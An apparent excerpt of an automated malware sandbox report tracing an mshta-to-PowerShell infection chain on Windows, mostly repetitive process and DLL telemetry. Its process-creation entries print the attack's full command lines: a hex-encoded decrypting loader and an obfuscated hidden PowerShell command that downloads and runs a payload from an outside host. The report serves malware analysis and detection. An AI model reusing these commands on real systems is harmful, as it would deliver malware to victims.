              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: powershell.exe, 00000006.00000002.3467126225.00000000030A0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: powershell.exe, 00000006.00000002.3467126225.00000000030A0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: powershell.exe, 00000006.00000002.3510342893.00000000074D0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: powershell.exe, 00000006.00000002.3510342893.00000000074D0000.00000004.08000000.00040000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: 6.2.powershell.exe.30a0000.0.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 6.2.powershell.exe.30a0000.0.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 6.2.powershell.exe.30a0000.0.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
              Source: 6.2.powershell.exe.74d0000.2.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
              Source: 6.2.powershell.exe.74d0000.2.raw.unpack, ListDecorator.cs.Net Code: Read
              Source: 6.2.powershell.exe.74d0000.2.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
              Source: 6.2.powershell.exe.74d0000.2.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
              Source: 6.2.powershell.exe.74d0000.2.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Z));$ByteStRIng = $ENC.$ASk1r0SzJ9w7hlI1lzDwd6IqFQAkaVGMEN1fkiV4kcfSFvzFnWv14rftd4lwO5cHUNH3qIAY2a68CgayXC47vIBwZWbOUQJsQcXG2eyiTBO0zFKHSgnE4NhjKtZuMdEAok03qz8HjbVZUM6zPeez4UzgGWAwOd
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function htXbx($EYwy){return -split ($EYwy -replace '..', '0x$& ')};$sMkL = htXbx('0F7A7222E17CFB1BB92172CFD10B1A0A35F2D236DE6DD8D72D66B13FEDB4D7CF6A19FA5E844D4EA4BDA294B8324F3D40BBE3A32FA2F602F7EEC40E64690703556F440E32E54DB889F70490BFAB024711BA156E7EF3961FB117120CBA4913EA1E5D84ACF6F55EBA7C85C4EDEAE94CA6F88E91D98428FF8C02DEA04EB6BC87CD7054DA2412B8E711F8C1A790EDD10E33300549B54953E993973674C4C6B322DF9A94608D0E38BF1B68335F96BFDC063A0ACAC3F5674C4FB62FD421AFD6B98437F6E9805448603B36D23A3100350C5424A024DEBEE06EFCCB25BC5C2ED9E55F0ECDF8D82A5F5B3DDE3DD01D9414613DC77C41FF3714787CA86BAB941A84FA1697BFD67AE1442E846F4C0BCD12067B97F4C4761C790D99134685BD29D33EB13930E881348CCEB581A392F1C4D3A954998DE262A182E3BA192BC030972631DFF7761B192A8E761FB393F15CEC5503F481993757B7386A6DEFCB30893CB5510F8D9DFCD357A4503657121993C1DA20619FC16A76829A33DC8BEC2C25B345E40D743AE3FA6908A2256106EDB3D401A541BBC6B63D25361ED338A28142AEDFD2E2AFA4224709FD2AB99578CAD2D426AC01B625107469B2CFC6F80544CD0418A85DF7B0034592F05C391690F1CB1F0E38C8C36984958B671982168DA7FCD4BA7B76DA7D1F52FBD0449C19027B914FDE6DE5FAAA8CB6BF3F2A4274A8F5CCEED4E85FE2BAE43E079DB816A326CFEC5CF89E8BDA8C7656D7ABB681564558044E3E53669EE9994092F98411AB22F4889A3454BB3DA6791DB0F9C47830F4C06A5461824C4CD5AF8028E685AAA4298897434D4728EDCF0C7F21C0C4A773C3B93B8D500AD8247E5F882A6D58627B2848A409F59326CE2F3C94419453CBD81D72A42EFC7700BF0F755EBF04E26ADC65680A8AB81DC31B386413F68BDCDF1C0851EABFB0BBAE9CCC1EEC68F50A6C1E0D56474F854AE2306A1E2A3F8B94A0127DD3E51C4A536048EF14CDBF4B53A4E0C3EEFEFA4EED2CFE4541E54F2D69773940D13F9015002C0555FDC45820883EE8D40D25214D7139E6E12032C2BFE100C55FA40524F297C439B1A01353D2284C6CEF35AC57E4400EDA829B3E642624CDFA0BC2973809DC3345E9E56C2D1156147CEA34B91CFFF59896E54208B4CFD4207A17F7308C33D76C6413AB80C8D92695DDC466BC03F75D4179A7F1740B7A3E5A6C6D80F2FB8D74FFB55BD62E27D14A6503857D18986D8E19A1D8E35AD79FEE150ABE148D1B1C3E2D9D92C0B0BDF7DE18DFF55FD02B3212CC62401C8900CAECAAADE5361BFC807F5384EEA46BABDA1F2032769CDA2B56A725574AD832150B7026D06D0547D37743BD92A3253A6BE7C4BE7457307E6CDE57B7840C35ECC06809A8FA8BF2351601EA6C1E3A025BA6CD107626BBF16CFED99355A4AC130AD2BEF7D8E3B1D936DC4D667BAE44082E02E0251C2355712885575901AEFDC0139AA662D0B9C4ACBF7403673B3C7DDF9E6E3AB15A286FC41C2D998ED91EDD22436BA61DD3F3D745E36681712D110962FBD642A2CB901801E7AF328696116A425AC0D6F7C474A297EBC5F89A3C52EE8DB03DE0214B816208AD47E4A4EB4864F152130AEA847AD1031A9DDED4248D031BCE58B447EB0CC8763D2CDBF3348D053D54B42C707D6DE3B3166FBF46CFB8F8AB676945A5D0B7FF4DD2DAF54B40F69592D58649EFE2B1F4CDADC627160733882C0C916DE660976CBCD588F71A3D08308A76F8B82ED698B928D9B2C66911F8A2975942AC360069AC4B4D6C8C7E50E99B0CBD066A58477B4F336F9B12A5FE792E23ED42C6032B887E634ABCA3D08214B16E5953BBD4FFBD057E229E4B7A149D754E75229CD7B38CB289B484AE636864DAFC411FEA976653DC57F0E7B6EA81960AC0059DB8FD2E23F7D92ABD90CDC902BB6F71F0094EF783BB18777A34E0B7531A8C1A945811E9CB1DB684D8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command Set-Item Variable:/B 'Net.WebClient';SV plm 'https://atsuka.thrivezest.org/hubus.xlsx';sl;SI Variable:\z (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'G*Cm*t'}).Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{(DIR Variable:\_).Value.Name-like'*Com*e'}).Name).Invoke('*w-*ct',1,$TRUE))(ChildItem Variable:\B).Value);SI Variable:O ((((Variable z).Value|GM)|Where-Object{(DIR Variable:\_).Value.Name-like'*wn*g'}).Name);($ExecutionContext|ForEach{(DIR Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{$_.(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'*w*i*ck'}).Name).Invoke((Variable z).Value.((GV O -ValueO)).Invoke((Variable plm).Value))}}).Invoke()
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function htXbx($EYwy){return -split ($EYwy -replace '..', '0x$& ')};$sMkL = htXbx('0F7A7222E17CFB1BB92172CFD10B1A0A35F2D236DE6DD8D72D66B13FEDB4D7CF6A19FA5E844D4EA4BDA294B8324F3D40BBE3A32FA2F602F7EEC40E64690703556F440E32E54DB889F70490BFAB024711BA156E7EF3961FB117120CBA4913EA1E5D84ACF6F55EBA7C85C4EDEAE94CA6F88E91D98428FF8C02DEA04EB6BC87CD7054DA2412B8E711F8C1A790EDD10E33300549B54953E993973674C4C6B322DF9A94608D0E38BF1B68335F96BFDC063A0ACAC3F5674C4FB62FD421AFD6B98437F6E9805448603B36D23A3100350C5424A024DEBEE06EFCCB25BC5C2ED9E55F0ECDF8D82A5F5B3DDE3DD01D9414613DC77C41FF3714787CA86BAB941A84FA1697BFD67AE1442E846F4C0BCD12067B97F4C4761C790D99134685BD29D33EB13930E881348CCEB581A392F1C4D3A954998DE262A182E3BA192BC030972631DFF7761B192A8E761FB393F15CEC5503F481993757B7386A6DEFCB30893CB5510F8D9DFCD357A4503657121993C1DA20619FC16A76829A33DC8BEC2C25B345E40D743AE3FA6908A2256106EDB3D401A541BBC6B63D25361ED338A28142AEDFD2E2AFA4224709FD2AB99578CAD2D426AC01B625107469B2CFC6F80544CD0418A85DF7B0034592F05C391690F1CB1F0E38C8C36984958B671982168DA7FCD4BA7B76DA7D1F52FBD0449C19027B914FDE6DE5FAAA8CB6BF3F2A4274A8F5CCEED4E85FE2BAE43E079DB816A326CFEC5CF89E8BDA8C7656D7ABB681564558044E3E53669EE9994092F98411AB22F4889A3454BB3DA6791DB0F9C47830F4C06A5461824C4CD5AF8028E685AAA4298897434D4728EDCF0C7F21C0C4A773C3B93B8D500AD8247E5F882A6D58627B2848A409F59326CE2F3C94419453CBD81D72A42EFC7700BF0F755EBF04E26ADC65680A8AB81DC31B386413F68BDCDF1C0851EABFB0BBAE9CCC1EEC68F50A6C1E0D56474F854AE2306A1E2A3F8B94A0127DD3E51C4A536048EF14CDBF4B53A4E0C3EEFEFA4EED2CFE4541E54F2D69773940D13F9015002C0555FDC45820883EE8D40D25214D7139E6E12032C2BFE100C55FA40524F297C439B1A01353D2284C6CEF35AC57E4400EDA829B3E642624CDFA0BC2973809DC3345E9E56C2D1156147CEA34B91CFFF59896E54208B4CFD4207A17F7308C33D76C6413AB80C8D92695DDC466BC03F75D4179A7F1740B7A3E5A6C6D80F2FB8D74FFB55BD62E27D14A6503857D18986D8E19A1D8E35AD79FEE150ABE148D1B1C3E2D9D92C0B0BDF7DE18DFF55FD02B3212CC62401C8900CAECAAADE5361BFC807F5384EEA46BABDA1F2032769CDA2B56A725574AD832150B7026D06D0547D37743BD92A3253A6BE7C4BE7457307E6CDE57B7840C35ECC06809A8FA8BF2351601EA6C1E3A025BA6CD107626BBF16CFED99355A4AC130AD2BEF7D8E3B1D936DC4D667BAE44082E02E0251C2355712885575901AEFDC0139AA662D0B9C4ACBF7403673B3C7DDF9E6E3AB15A286FC41C2D998ED91EDD22436BA61DD3F3D745E36681712D110962FBD642A2CB901801E7AF328696116A425AC0D6F7C474A297EBC5F89A3C52EE8DB03DE0214B816208AD47E4A4EB4864F152130AEA847AD1031A9DDED4248D031BCE58B447EB0CC8763D2CDBF3348D053D54B42C707D6DE3B3166FBF46CFB8F8AB676945A5D0B7FF4DD2DAF54B40F69592D58649EFE2B1F4CDADC627160733882C0C916DE660976CBCD588F71A3D08308A76F8B82ED698B928D9B2C66911F8A2975942AC360069AC4B4D6C8C7E50E99B0CBD066A58477B4F336F9B12A5FE792E23ED42C6032B887E634ABCA3D08214B16E5953BBD4FFBD057E229E4B7A149D754E75229CD7B38CB289B484AE636864DAFC411FEA976653DC57F0E7B6EA81960AC0059DB8FD2E23F7D92ABD90CDC902BB6F71F0094EF783BB18777A34E0B7531A8C1A945811E9CB1DB684D8Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command Set-Item Variable:/B 'Net.WebClient';SV plm 'https://atsuka.thrivezest.org/hubus.xlsx';sl;SI Variable:\z (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'G*Cm*t'}).Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{(DIR Variable:\_).Value.Name-like'*Com*e'}).Name).Invoke('*w-*ct',1,$TRUE))(ChildItem Variable:\B).Value);SI Variable:O ((((Variable z).Value|GM)|Where-Object{(DIR Variable:\_).Value.Name-like'*wn*g'}).Name);($ExecutionContext|ForEach{(DIR Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{$_.(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'*w*i*ck'}).Name).Invoke((Variable z).Value.((GV O -ValueO)).Invoke((Variable plm).Value))}}).Invoke() Jump to behavior
              Source: Yara matchFile source: 6.2.powershell.exe.73c0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.3505131784.00000000073C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1428, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0325B8A5 push ebx; retf 6_2_0325B8B2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_07158CD5 push FFFFFF8Bh; retf 6_2_07158CD7
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_07390DCC push esp; retf 6_2_07390DCD
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_074B0261 push dword ptr [ebx+esi-75h]; iretd 6_2_074B026D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_074CAD7A push ds; iretd 6_2_074CAD81
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_074CB993 push es; ret 6_2_074CB999
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0862FD98 push eax; ret 6_2_0862FD99
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0862CF52 push FFFFFF8Bh; iretd 6_2_0862CF59
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_086242E2 push BC088E39h; iretd 6_2_086242ED
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0043DA00 push eax; mov dword ptr [esp], F9F8F7A6h22_2_0043DA02
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00446233 pushfd ; iretd 22_2_00446242
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_004462A7 pushfd ; iretd 22_2_00446242
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0043AC40 push eax; mov dword ptr [esp], E2E3E4E5h22_2_0043AC4E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00443F28 push esp; iretd 22_2_00443F3C
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
